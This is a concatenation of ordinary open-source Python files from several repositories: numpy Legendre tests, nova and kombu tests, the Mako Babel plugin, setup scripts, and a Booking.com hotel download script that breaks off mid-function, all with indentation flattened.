self.fail('Unexpected return values from select():', rfd, wfd, xfd)
p.close()
def test_main():
test_support.run_unittest(SelectTestCase)
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
pizzapanther/Django-Pizza
|
refs/heads/master
|
pizza/calendar/urls.py
|
1
|
from django.conf.urls import patterns, include, url
urlpatterns = patterns('pizza.calendar.views',
url(r'^$', 'events', name='all'),
)
|
valexandersaulys/airbnb_kaggle_contest
|
refs/heads/master
|
venv/lib/python3.4/site-packages/numpy/polynomial/tests/test_legendre.py
|
123
|
"""Tests for legendre module.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
import numpy.polynomial.legendre as leg
from numpy.polynomial.polynomial import polyval
from numpy.testing import (
TestCase, assert_almost_equal, assert_raises,
assert_equal, assert_, run_module_suite)
L0 = np.array([1])
L1 = np.array([0, 1])
L2 = np.array([-1, 0, 3])/2
L3 = np.array([0, -3, 0, 5])/2
L4 = np.array([3, 0, -30, 0, 35])/8
L5 = np.array([0, 15, 0, -70, 0, 63])/8
L6 = np.array([-5, 0, 105, 0, -315, 0, 231])/16
L7 = np.array([0, -35, 0, 315, 0, -693, 0, 429])/16
L8 = np.array([35, 0, -1260, 0, 6930, 0, -12012, 0, 6435])/128
L9 = np.array([0, 315, 0, -4620, 0, 18018, 0, -25740, 0, 12155])/128
Llist = [L0, L1, L2, L3, L4, L5, L6, L7, L8, L9]
def trim(x):
return leg.legtrim(x, tol=1e-6)
class TestConstants(TestCase):
def test_legdomain(self):
assert_equal(leg.legdomain, [-1, 1])
def test_legzero(self):
assert_equal(leg.legzero, [0])
def test_legone(self):
assert_equal(leg.legone, [1])
def test_legx(self):
assert_equal(leg.legx, [0, 1])
class TestArithmetic(TestCase):
x = np.linspace(-1, 1, 100)
def test_legadd(self):
for i in range(5):
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
tgt = np.zeros(max(i, j) + 1)
tgt[i] += 1
tgt[j] += 1
res = leg.legadd([0]*i + [1], [0]*j + [1])
assert_equal(trim(res), trim(tgt), err_msg=msg)
def test_legsub(self):
for i in range(5):
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
tgt = np.zeros(max(i, j) + 1)
tgt[i] += 1
tgt[j] -= 1
res = leg.legsub([0]*i + [1], [0]*j + [1])
assert_equal(trim(res), trim(tgt), err_msg=msg)
def test_legmulx(self):
assert_equal(leg.legmulx([0]), [0])
assert_equal(leg.legmulx([1]), [0, 1])
for i in range(1, 5):
tmp = 2*i + 1
ser = [0]*i + [1]
tgt = [0]*(i - 1) + [i/tmp, 0, (i + 1)/tmp]
assert_equal(leg.legmulx(ser), tgt)
def test_legmul(self):
# check values of result
for i in range(5):
pol1 = [0]*i + [1]
val1 = leg.legval(self.x, pol1)
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
pol2 = [0]*j + [1]
val2 = leg.legval(self.x, pol2)
pol3 = leg.legmul(pol1, pol2)
val3 = leg.legval(self.x, pol3)
assert_(len(pol3) == i + j + 1, msg)
assert_almost_equal(val3, val1*val2, err_msg=msg)
def test_legdiv(self):
for i in range(5):
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
ci = [0]*i + [1]
cj = [0]*j + [1]
tgt = leg.legadd(ci, cj)
quo, rem = leg.legdiv(tgt, ci)
res = leg.legadd(leg.legmul(quo, ci), rem)
assert_equal(trim(res), trim(tgt), err_msg=msg)
class TestEvaluation(TestCase):
# coefficients of 1 + 2*x + 3*x**2
c1d = np.array([2., 2., 2.])
c2d = np.einsum('i,j->ij', c1d, c1d)
c3d = np.einsum('i,j,k->ijk', c1d, c1d, c1d)
# some random values in [-1, 1)
x = np.random.random((3, 5))*2 - 1
y = polyval(x, [1., 2., 3.])
def test_legval(self):
#check empty input
assert_equal(leg.legval([], [1]).size, 0)
        #check normal input
x = np.linspace(-1, 1)
y = [polyval(x, c) for c in Llist]
for i in range(10):
msg = "At i=%d" % i
tgt = y[i]
res = leg.legval(x, [0]*i + [1])
assert_almost_equal(res, tgt, err_msg=msg)
#check that shape is preserved
for i in range(3):
dims = [2]*i
x = np.zeros(dims)
assert_equal(leg.legval(x, [1]).shape, dims)
assert_equal(leg.legval(x, [1, 0]).shape, dims)
assert_equal(leg.legval(x, [1, 0, 0]).shape, dims)
def test_legval2d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test exceptions
assert_raises(ValueError, leg.legval2d, x1, x2[:2], self.c2d)
#test values
tgt = y1*y2
res = leg.legval2d(x1, x2, self.c2d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = leg.legval2d(z, z, self.c2d)
assert_(res.shape == (2, 3))
def test_legval3d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test exceptions
assert_raises(ValueError, leg.legval3d, x1, x2, x3[:2], self.c3d)
#test values
tgt = y1*y2*y3
res = leg.legval3d(x1, x2, x3, self.c3d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = leg.legval3d(z, z, z, self.c3d)
assert_(res.shape == (2, 3))
def test_leggrid2d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test values
tgt = np.einsum('i,j->ij', y1, y2)
res = leg.leggrid2d(x1, x2, self.c2d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = leg.leggrid2d(z, z, self.c2d)
assert_(res.shape == (2, 3)*2)
def test_leggrid3d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test values
tgt = np.einsum('i,j,k->ijk', y1, y2, y3)
res = leg.leggrid3d(x1, x2, x3, self.c3d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = leg.leggrid3d(z, z, z, self.c3d)
assert_(res.shape == (2, 3)*3)
class TestIntegral(TestCase):
def test_legint(self):
# check exceptions
assert_raises(ValueError, leg.legint, [0], .5)
assert_raises(ValueError, leg.legint, [0], -1)
assert_raises(ValueError, leg.legint, [0], 1, [0, 0])
# test integration of zero polynomial
for i in range(2, 5):
k = [0]*(i - 2) + [1]
res = leg.legint([0], m=i, k=k)
assert_almost_equal(res, [0, 1])
# check single integration with integration constant
for i in range(5):
scl = i + 1
pol = [0]*i + [1]
tgt = [i] + [0]*i + [1/scl]
legpol = leg.poly2leg(pol)
legint = leg.legint(legpol, m=1, k=[i])
res = leg.leg2poly(legint)
assert_almost_equal(trim(res), trim(tgt))
# check single integration with integration constant and lbnd
for i in range(5):
scl = i + 1
pol = [0]*i + [1]
legpol = leg.poly2leg(pol)
legint = leg.legint(legpol, m=1, k=[i], lbnd=-1)
assert_almost_equal(leg.legval(-1, legint), i)
# check single integration with integration constant and scaling
for i in range(5):
scl = i + 1
pol = [0]*i + [1]
tgt = [i] + [0]*i + [2/scl]
legpol = leg.poly2leg(pol)
legint = leg.legint(legpol, m=1, k=[i], scl=2)
res = leg.leg2poly(legint)
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with default k
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = leg.legint(tgt, m=1)
res = leg.legint(pol, m=j)
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with defined k
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = leg.legint(tgt, m=1, k=[k])
res = leg.legint(pol, m=j, k=list(range(j)))
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with lbnd
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = leg.legint(tgt, m=1, k=[k], lbnd=-1)
res = leg.legint(pol, m=j, k=list(range(j)), lbnd=-1)
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with scaling
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = leg.legint(tgt, m=1, k=[k], scl=2)
res = leg.legint(pol, m=j, k=list(range(j)), scl=2)
assert_almost_equal(trim(res), trim(tgt))
def test_legint_axis(self):
# check that axis keyword works
c2d = np.random.random((3, 4))
tgt = np.vstack([leg.legint(c) for c in c2d.T]).T
res = leg.legint(c2d, axis=0)
assert_almost_equal(res, tgt)
tgt = np.vstack([leg.legint(c) for c in c2d])
res = leg.legint(c2d, axis=1)
assert_almost_equal(res, tgt)
tgt = np.vstack([leg.legint(c, k=3) for c in c2d])
res = leg.legint(c2d, k=3, axis=1)
assert_almost_equal(res, tgt)
class TestDerivative(TestCase):
def test_legder(self):
# check exceptions
assert_raises(ValueError, leg.legder, [0], .5)
assert_raises(ValueError, leg.legder, [0], -1)
# check that zeroth derivative does nothing
for i in range(5):
tgt = [0]*i + [1]
res = leg.legder(tgt, m=0)
assert_equal(trim(res), trim(tgt))
# check that derivation is the inverse of integration
for i in range(5):
for j in range(2, 5):
tgt = [0]*i + [1]
res = leg.legder(leg.legint(tgt, m=j), m=j)
assert_almost_equal(trim(res), trim(tgt))
# check derivation with scaling
for i in range(5):
for j in range(2, 5):
tgt = [0]*i + [1]
res = leg.legder(leg.legint(tgt, m=j, scl=2), m=j, scl=.5)
assert_almost_equal(trim(res), trim(tgt))
def test_legder_axis(self):
# check that axis keyword works
c2d = np.random.random((3, 4))
tgt = np.vstack([leg.legder(c) for c in c2d.T]).T
res = leg.legder(c2d, axis=0)
assert_almost_equal(res, tgt)
tgt = np.vstack([leg.legder(c) for c in c2d])
res = leg.legder(c2d, axis=1)
assert_almost_equal(res, tgt)
class TestVander(TestCase):
# some random values in [-1, 1)
x = np.random.random((3, 5))*2 - 1
def test_legvander(self):
# check for 1d x
x = np.arange(3)
v = leg.legvander(x, 3)
assert_(v.shape == (3, 4))
for i in range(4):
coef = [0]*i + [1]
assert_almost_equal(v[..., i], leg.legval(x, coef))
# check for 2d x
x = np.array([[1, 2], [3, 4], [5, 6]])
v = leg.legvander(x, 3)
assert_(v.shape == (3, 2, 4))
for i in range(4):
coef = [0]*i + [1]
assert_almost_equal(v[..., i], leg.legval(x, coef))
def test_legvander2d(self):
# also tests legval2d for a non-square coefficient array
x1, x2, x3 = self.x
c = np.random.random((2, 3))
van = leg.legvander2d(x1, x2, [1, 2])
tgt = leg.legval2d(x1, x2, c)
res = np.dot(van, c.flat)
assert_almost_equal(res, tgt)
# check shape
van = leg.legvander2d([x1], [x2], [1, 2])
assert_(van.shape == (1, 5, 6))
def test_legvander3d(self):
# also tests legval3d for a non-square coefficient array
x1, x2, x3 = self.x
c = np.random.random((2, 3, 4))
van = leg.legvander3d(x1, x2, x3, [1, 2, 3])
tgt = leg.legval3d(x1, x2, x3, c)
res = np.dot(van, c.flat)
assert_almost_equal(res, tgt)
# check shape
van = leg.legvander3d([x1], [x2], [x3], [1, 2, 3])
assert_(van.shape == (1, 5, 24))
class TestFitting(TestCase):
def test_legfit(self):
def f(x):
return x*(x - 1)*(x - 2)
# Test exceptions
assert_raises(ValueError, leg.legfit, [1], [1], -1)
assert_raises(TypeError, leg.legfit, [[1]], [1], 0)
assert_raises(TypeError, leg.legfit, [], [1], 0)
assert_raises(TypeError, leg.legfit, [1], [[[1]]], 0)
assert_raises(TypeError, leg.legfit, [1, 2], [1], 0)
assert_raises(TypeError, leg.legfit, [1], [1, 2], 0)
assert_raises(TypeError, leg.legfit, [1], [1], 0, w=[[1]])
assert_raises(TypeError, leg.legfit, [1], [1], 0, w=[1, 1])
# Test fit
x = np.linspace(0, 2)
y = f(x)
#
coef3 = leg.legfit(x, y, 3)
assert_equal(len(coef3), 4)
assert_almost_equal(leg.legval(x, coef3), y)
#
coef4 = leg.legfit(x, y, 4)
assert_equal(len(coef4), 5)
assert_almost_equal(leg.legval(x, coef4), y)
#
coef2d = leg.legfit(x, np.array([y, y]).T, 3)
assert_almost_equal(coef2d, np.array([coef3, coef3]).T)
# test weighting
w = np.zeros_like(x)
yw = y.copy()
w[1::2] = 1
y[0::2] = 0
wcoef3 = leg.legfit(x, yw, 3, w=w)
assert_almost_equal(wcoef3, coef3)
#
wcoef2d = leg.legfit(x, np.array([yw, yw]).T, 3, w=w)
assert_almost_equal(wcoef2d, np.array([coef3, coef3]).T)
# test fitting with complex x values whose squares sum to zero
x = [1, 1j, -1, -1j]
assert_almost_equal(leg.legfit(x, x, 1), [0, 1])
class TestCompanion(TestCase):
def test_raises(self):
assert_raises(ValueError, leg.legcompanion, [])
assert_raises(ValueError, leg.legcompanion, [1])
def test_dimensions(self):
for i in range(1, 5):
coef = [0]*i + [1]
assert_(leg.legcompanion(coef).shape == (i, i))
def test_linear_root(self):
assert_(leg.legcompanion([1, 2])[0, 0] == -.5)
class TestGauss(TestCase):
def test_100(self):
x, w = leg.leggauss(100)
# test orthogonality. Note that the results need to be normalized,
# otherwise the huge values that can arise from fast growing
# functions like Laguerre can be very confusing.
v = leg.legvander(x, 99)
vv = np.dot(v.T * w, v)
vd = 1/np.sqrt(vv.diagonal())
vv = vd[:, None] * vv * vd
assert_almost_equal(vv, np.eye(100))
# check that the integral of 1 is correct
tgt = 2.0
assert_almost_equal(w.sum(), tgt)
class TestMisc(TestCase):
def test_legfromroots(self):
res = leg.legfromroots([])
assert_almost_equal(trim(res), [1])
for i in range(1, 5):
roots = np.cos(np.linspace(-np.pi, 0, 2*i + 1)[1::2])
pol = leg.legfromroots(roots)
res = leg.legval(roots, pol)
tgt = 0
assert_(len(pol) == i + 1)
assert_almost_equal(leg.leg2poly(pol)[-1], 1)
assert_almost_equal(res, tgt)
def test_legroots(self):
assert_almost_equal(leg.legroots([1]), [])
assert_almost_equal(leg.legroots([1, 2]), [-.5])
for i in range(2, 5):
tgt = np.linspace(-1, 1, i)
res = leg.legroots(leg.legfromroots(tgt))
assert_almost_equal(trim(res), trim(tgt))
def test_legtrim(self):
coef = [2, -1, 1, 0]
# Test exceptions
assert_raises(ValueError, leg.legtrim, coef, -1)
# Test results
assert_equal(leg.legtrim(coef), coef[:-1])
assert_equal(leg.legtrim(coef, 1), coef[:-3])
assert_equal(leg.legtrim(coef, 2), [0])
def test_legline(self):
assert_equal(leg.legline(3, 4), [3, 4])
def test_leg2poly(self):
for i in range(10):
assert_almost_equal(leg.leg2poly([0]*i + [1]), Llist[i])
def test_poly2leg(self):
for i in range(10):
assert_almost_equal(leg.poly2leg(Llist[i]), [0]*i + [1])
def test_weight(self):
x = np.linspace(-1, 1, 11)
tgt = 1.
res = leg.legweight(x)
assert_almost_equal(res, tgt)
if __name__ == "__main__":
run_module_suite()
|
MountainWei/nova
|
refs/heads/master
|
nova/tests/unit/api/openstack/compute/test_extended_virtual_interfaces_net.py
|
35
|
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_serialization import jsonutils
import webob
from nova.api.openstack.compute.legacy_v2.contrib import \
extended_virtual_interfaces_net
from nova import compute
from nova import network
from nova.objects import virtual_interface as vif_obj
from nova import test
from nova.tests.unit.api.openstack import fakes
FAKE_UUID = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
EXPECTED_NET_UUIDS = [123,
456]
def _generate_fake_vifs(context):
vif = vif_obj.VirtualInterface(context=context)
vif.address = '00-00-00-00-00-00'
vif.net_uuid = 123
vif.uuid = '00000000-0000-0000-0000-00000000000000000'
fake_vifs = [vif]
vif = vif_obj.VirtualInterface(context=context)
vif.address = '11-11-11-11-11-11'
vif.net_uuid = 456
vif.uuid = '11111111-1111-1111-1111-11111111111111111'
fake_vifs.append(vif)
return fake_vifs
def compute_api_get(self, context, instance_id, expected_attrs=None,
want_objects=False):
return dict(uuid=FAKE_UUID, id=instance_id, instance_type_id=1, host='bob')
def get_vifs_by_instance(self, context, instance_id):
return _generate_fake_vifs(context)
def get_vif_by_mac_address(self, context, mac_address):
if mac_address == "00-00-00-00-00-00":
return _generate_fake_vifs(context)[0]
else:
return _generate_fake_vifs(context)[1]
class ExtendedServerVIFNetTest(test.NoDBTestCase):
content_type = 'application/json'
prefix = "%s:" % extended_virtual_interfaces_net. \
Extended_virtual_interfaces_net.alias
def setUp(self):
super(ExtendedServerVIFNetTest, self).setUp()
self.stubs.Set(compute.api.API, "get",
compute_api_get)
self.stubs.Set(network.api.API, "get_vifs_by_instance",
get_vifs_by_instance)
self.stubs.Set(network.api.API, "get_vif_by_mac_address",
get_vif_by_mac_address)
self.flags(
osapi_compute_extension=[
'nova.api.openstack.compute.contrib.select_extensions'],
osapi_compute_ext_list=['Virtual_interfaces',
'Extended_virtual_interfaces_net'])
def _make_request(self, url):
req = webob.Request.blank(url)
req.headers['Accept'] = self.content_type
res = req.get_response(fakes.wsgi_app(init_only=(
'os-virtual-interfaces', 'OS-EXT-VIF-NET')))
return res
def _get_vifs(self, body):
return jsonutils.loads(body).get('virtual_interfaces')
def _get_net_id(self, vifs):
for vif in vifs:
yield vif['%snet_id' % self.prefix]
def assertVIFs(self, vifs):
result = []
for net_id in self._get_net_id(vifs):
result.append(net_id)
result.sort()
for i, net_uuid in enumerate(result):
self.assertEqual(net_uuid, EXPECTED_NET_UUIDS[i])
def test_get_extend_virtual_interfaces_list(self):
res = self._make_request('/v2/fake/servers/abcd/os-virtual-interfaces')
self.assertEqual(res.status_int, 200)
self.assertVIFs(self._get_vifs(res.body))
|
thunderace/newtifry
|
refs/heads/master
|
appengine/mako/ext/babelplugin.py
|
60
|
# ext/babelplugin.py
# Copyright (C) 2006-2015 the Mako authors and contributors <see AUTHORS file>
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""gettext message extraction via Babel: http://babel.edgewall.org/"""
from babel.messages.extract import extract_python
from mako.ext.extract import MessageExtractor
class BabelMakoExtractor(MessageExtractor):
def __init__(self, keywords, comment_tags, options):
self.keywords = keywords
self.options = options
self.config = {
'comment-tags': u' '.join(comment_tags),
'encoding': options.get('input_encoding',
options.get('encoding', None)),
}
super(BabelMakoExtractor, self).__init__()
def __call__(self, fileobj):
return self.process_file(fileobj)
def process_python(self, code, code_lineno, translator_strings):
comment_tags = self.config['comment-tags']
for lineno, funcname, messages, python_translator_comments \
in extract_python(code,
self.keywords, comment_tags, self.options):
yield (code_lineno + (lineno - 1), funcname, messages,
translator_strings + python_translator_comments)
def extract(fileobj, keywords, comment_tags, options):
"""Extract messages from Mako templates.
:param fileobj: the file-like object the messages should be extracted from
:param keywords: a list of keywords (i.e. function names) that should be
recognized as translation functions
:param comment_tags: a list of translator tags to search for and include
in the results
:param options: a dictionary of additional options (optional)
:return: an iterator over ``(lineno, funcname, message, comments)`` tuples
:rtype: ``iterator``
"""
extractor = BabelMakoExtractor(keywords, comment_tags, options)
for message in extractor(fileobj):
yield message
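# A minimal, illustrative sketch of how this plugin can be driven directly
# (not part of the original module). Babel normally calls ``extract`` through
# its extraction-method configuration; the template text and keyword list
# below are assumptions for demonstration only.
if __name__ == '__main__':
    from io import StringIO
    demo_template = StringIO(u'<p>${_("Hello, world")}</p>')
    for _lineno, _funcname, _message, _comments in extract(
            demo_template, ['_'], [], {}):
        # Expected, roughly: (1, '_', u'Hello, world', [])
        print((_lineno, _funcname, _message, _comments))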
|
ZoranPavlovic/kombu
|
refs/heads/master
|
t/unit/transport/test_filesystem.py
|
2
|
import tempfile
import pytest
import t.skip
from kombu import Connection, Exchange, Queue, Consumer, Producer
@t.skip.if_win32
class test_FilesystemTransport:
def setup(self):
self.channels = set()
try:
data_folder_in = tempfile.mkdtemp()
data_folder_out = tempfile.mkdtemp()
except Exception:
pytest.skip('filesystem transport: cannot create tempfiles')
self.c = Connection(transport='filesystem',
transport_options={
'data_folder_in': data_folder_in,
'data_folder_out': data_folder_out,
})
self.channels.add(self.c.default_channel)
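# The second connection below deliberately swaps data_folder_in and
# data_folder_out relative to self.c, so messages published through self.p
# are written into the folder that self.c consumes from (and vice versa).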
self.p = Connection(transport='filesystem',
transport_options={
'data_folder_in': data_folder_out,
'data_folder_out': data_folder_in,
})
self.channels.add(self.p.default_channel)
self.e = Exchange('test_transport_filesystem')
self.q = Queue('test_transport_filesystem',
exchange=self.e,
routing_key='test_transport_filesystem')
self.q2 = Queue('test_transport_filesystem2',
exchange=self.e,
routing_key='test_transport_filesystem2')
def teardown(self):
# make sure we don't attempt to restore messages at shutdown.
for channel in self.channels:
try:
channel._qos._dirty.clear()
except AttributeError:
pass
try:
channel._qos._delivered.clear()
except AttributeError:
pass
def _add_channel(self, channel):
self.channels.add(channel)
return channel
def test_produce_consume_noack(self):
producer = Producer(self._add_channel(self.p.channel()), self.e)
consumer = Consumer(self._add_channel(self.c.channel()), self.q,
no_ack=True)
for i in range(10):
producer.publish({'foo': i},
routing_key='test_transport_filesystem')
_received = []
def callback(message_data, message):
_received.append(message)
consumer.register_callback(callback)
consumer.consume()
while 1:
if len(_received) == 10:
break
self.c.drain_events()
assert len(_received) == 10
def test_produce_consume(self):
producer_channel = self._add_channel(self.p.channel())
consumer_channel = self._add_channel(self.c.channel())
producer = Producer(producer_channel, self.e)
consumer1 = Consumer(consumer_channel, self.q)
consumer2 = Consumer(consumer_channel, self.q2)
self.q2(consumer_channel).declare()
for i in range(10):
producer.publish({'foo': i},
routing_key='test_transport_filesystem')
for i in range(10):
producer.publish({'foo': i},
routing_key='test_transport_filesystem2')
_received1 = []
_received2 = []
def callback1(message_data, message):
_received1.append(message)
message.ack()
def callback2(message_data, message):
_received2.append(message)
message.ack()
consumer1.register_callback(callback1)
consumer2.register_callback(callback2)
consumer1.consume()
consumer2.consume()
while 1:
if len(_received1) + len(_received2) == 20:
break
self.c.drain_events()
assert len(_received1) + len(_received2) == 20
# compression
producer.publish({'compressed': True},
routing_key='test_transport_filesystem',
compression='zlib')
m = self.q(consumer_channel).get()
assert m.payload == {'compressed': True}
# queue.delete
for i in range(10):
producer.publish({'foo': i},
routing_key='test_transport_filesystem')
assert self.q(consumer_channel).get()
self.q(consumer_channel).delete()
self.q(consumer_channel).declare()
assert self.q(consumer_channel).get() is None
# queue.purge
for i in range(10):
producer.publish({'foo': i},
routing_key='test_transport_filesystem2')
assert self.q2(consumer_channel).get()
self.q2(consumer_channel).purge()
assert self.q2(consumer_channel).get() is None
|
yaqiyang/autorest
|
refs/heads/master
|
src/client/Python/msrest/msrest/__init__.py
|
13
|
# --------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
# --------------------------------------------------------------------------
from .configuration import Configuration
from .service_client import ServiceClient
from .serialization import Serializer, Deserializer
from .version import msrest_version
__all__ = [
"ServiceClient",
"Serializer",
"Deserializer",
"Configuration"
]
__version__ = msrest_version
|
axinging/chromium-crosswalk
|
refs/heads/master
|
build/android/pylib/monkey/setup.py
|
125
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates test runner factory and tests for monkey tests."""
from pylib.monkey import test_runner
def Setup(test_options):
"""Create and return the test runner factory and tests.
Args:
test_options: A MonkeyOptions object.
Returns:
A tuple of (TestRunnerFactory, tests).
"""
# Token to replicate across devices as the "test". The TestRunner does all of
# the work to run the test.
tests = ['MonkeyTest']
def TestRunnerFactory(device, shard_index):
return test_runner.TestRunner(
test_options, device, shard_index)
return (TestRunnerFactory, tests)
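# Illustrative usage sketch (not part of the original file): the surrounding
# harness is expected to fan the returned factory out over attached devices,
# e.g.
#   factory, tests = Setup(monkey_options)
#   runner = factory(device, shard_index)  # one runner per device/shard
# 'monkey_options', 'device' and 'shard_index' are placeholders supplied by
# the pylib dispatcher, not by this module.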
|
fsb4000/electrum-server
|
refs/heads/master
|
scrypt/setup.py
|
6
|
from distutils.core import setup, Extension
ltc_scrypt_module = Extension('ltc_scrypt',
sources = ['scryptmodule.c',
'scrypt.c'],
include_dirs=['.'])
setup (name = 'ltc_scrypt',
version = '1.0',
description = 'Bindings for scrypt proof of work used by Novacoin',
ext_modules = [ltc_scrypt_module])
|
trevisanj/f311
|
refs/heads/master
|
tests/test_filetypes/test_import_filetypes.py
|
1
|
import f311.filetypes as ft
def test_import_filetypes():
pass
|
alexzatsepin/omim
|
refs/heads/master
|
tools/python/booking/download_hotels.py
|
1
|
#!/usr/bin/env python
import argparse
import datetime
import logging
import os
import statistics
import sys
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor, as_completed
from functools import partial
from multiprocessing.pool import ThreadPool
import math
from eviltransform import gcj2wgs_exact
from tqdm import tqdm
from .api.booking_api import BookingApi, BookingListApi, LIMIT_REQUESTS_PER_MINUTE
from .api.exceptions import GettingMinPriceError
SUPPORTED_LANGUAGES = ("en", "ru", "ar", "cs", "da", "nl", "fi", "fr", "de",
"hu", "id", "it", "ja", "ko", "pl", "pt", "ro", "es",
"sv", "th", "tr", "uk", "vi", "zh", "he", "sk", "el")
class BookingGen:
def __init__(self, api, country):
self.api = api
self.country_code = country["country"]
self.country_name = country["name"]
logging.info(f"Download[{self.country_code}]: {self.country_name}")
extras = ["hotel_info", "room_info"]
self.hotels = self._download_hotels(extras=extras)
self.translations = self._download_translations()
self.currency_medians = self._currency_medians_by_cities()
def generate_tsv_rows(self, sep="\t"):
self._fix_hotels()
return (self._create_tsv_hotel_line(hotel, sep) for hotel in self.hotels)
@staticmethod
def _get_hotel_min_price(hotel):
prices = [float(x["room_info"]["min_price"]) for x in hotel["room_data"]]
flt = filter(lambda x: not math.isclose(x, 0.0), prices)
try:
return min(flt)
except ValueError:
raise GettingMinPriceError(f"Getting min price error: {prices}.")
@staticmethod
def _format_string(s):
s = s.strip()
for x in (("\t", " "), ("\n", " "), ("\r", "")):
s = s.replace(*x)
return s
def _download_hotels(self, **params):
return self.api.hotels(country_ids=self.country_code, **params)
def _download_translations(self):
extras = ["hotel_info", ]
translations = defaultdict(dict)
with ThreadPoolExecutor(max_workers=len(SUPPORTED_LANGUAGES)) as executor:
m = {executor.submit(self._download_hotels, extras=extras, language=lang): lang
for lang in SUPPORTED_LANGUAGES}
for future in as_completed(m):
lang = m[future]
hotels = future.result()
for hotel in hotels:
hotel_id = hotel["hotel_id"]
hotel_data = hotel["hotel_data"]
translations[hotel_id][lang] = {
"name": BookingGen._format_string(hotel_data["name"]),
"address": BookingGen._format_string(hotel_data["address"])
}
return translations
def _fix_hotels(self):
if self.country_code == "cn":
# Fix chinese coordinates.
# https://en.wikipedia.org/wiki/Restrictions_on_geographic_data_in_China
for hotel in self.hotels:
hotel_data = hotel["hotel_data"]
location = hotel_data["location"]
try:
location["latitude"], location["longitude"] = gcj2wgs_exact(
float(location["latitude"]), float(location["longitude"])
)
except ValueError:
logging.exception(f"Converting error {location}")
def _currency_medians_by_cities(self):
cities = defaultdict(lambda: defaultdict(list))
for hotel in self.hotels:
hotel_data = hotel["hotel_data"]
city_id = hotel_data["city_id"]
currency = hotel_data["currency"]
try:
price = BookingGen._get_hotel_min_price(hotel)
except GettingMinPriceError:
logging.exception("Getting min price error.")
continue
cities[city_id][currency].append(price)
for city in cities:
for currency in cities[city]:
cities[city][currency] = statistics.median(cities[city][currency])
return cities
def _get_rate(self, hotel):
# Price rate ranges, relative to the median price for a city
rates = (0.7, 1.3)
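# Illustrative example: with a city median price of 100, a price of 60
# (below 0.7 * 100) gets rate 1, a price of 100 (within the bounds) gets
# rate 2, and a price of 150 (above 1.3 * 100) gets rate 3.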
rate = 0
hotel_data = hotel["hotel_data"]
city_id = hotel_data["city_id"]
currency = hotel_data["currency"]
price = None
try:
price = BookingGen._get_hotel_min_price(hotel)
except GettingMinPriceError:
logging.exception("Getting min price error.")
return rate
avg = self.currency_medians[city_id][currency]
rate = 1
# Find a range that contains the price
while rate <= len(rates) and price > avg * rates[rate - 1]:
rate += 1
return rate
def _get_translations(self, hotel):
try:
tr = self.translations[hotel["hotel_id"]]
except KeyError:
return ""
hotel_data = hotel["hotel_data"]
name = hotel_data["name"]
address = hotel_data["address"]
tr_ = defaultdict(dict)
for k, v in tr.items():
n = v["name"] if v["name"] != name else ""
a = v["address"] if v["address"] != address else ""
if a or n:
tr_[k]["name"] = n
tr_[k]["address"] = a
tr_list = []
for tr_lang, tr_values in tr_.items():
tr_list.append(tr_lang)
tr_list.extend([tr_values[e] for e in ("name", "address")])
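# The serialized form is "lang|name|address|lang|name|address|...", with any
# '|' inside values replaced by ';'; e.g., illustratively, "de|Hotel Beispiel|"
# when only the name differs from the default language.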
return "|".join(s.replace("|", ";") for s in tr_list)
def _create_tsv_hotel_line(self, hotel, sep="\t"):
hotel_data = hotel["hotel_data"]
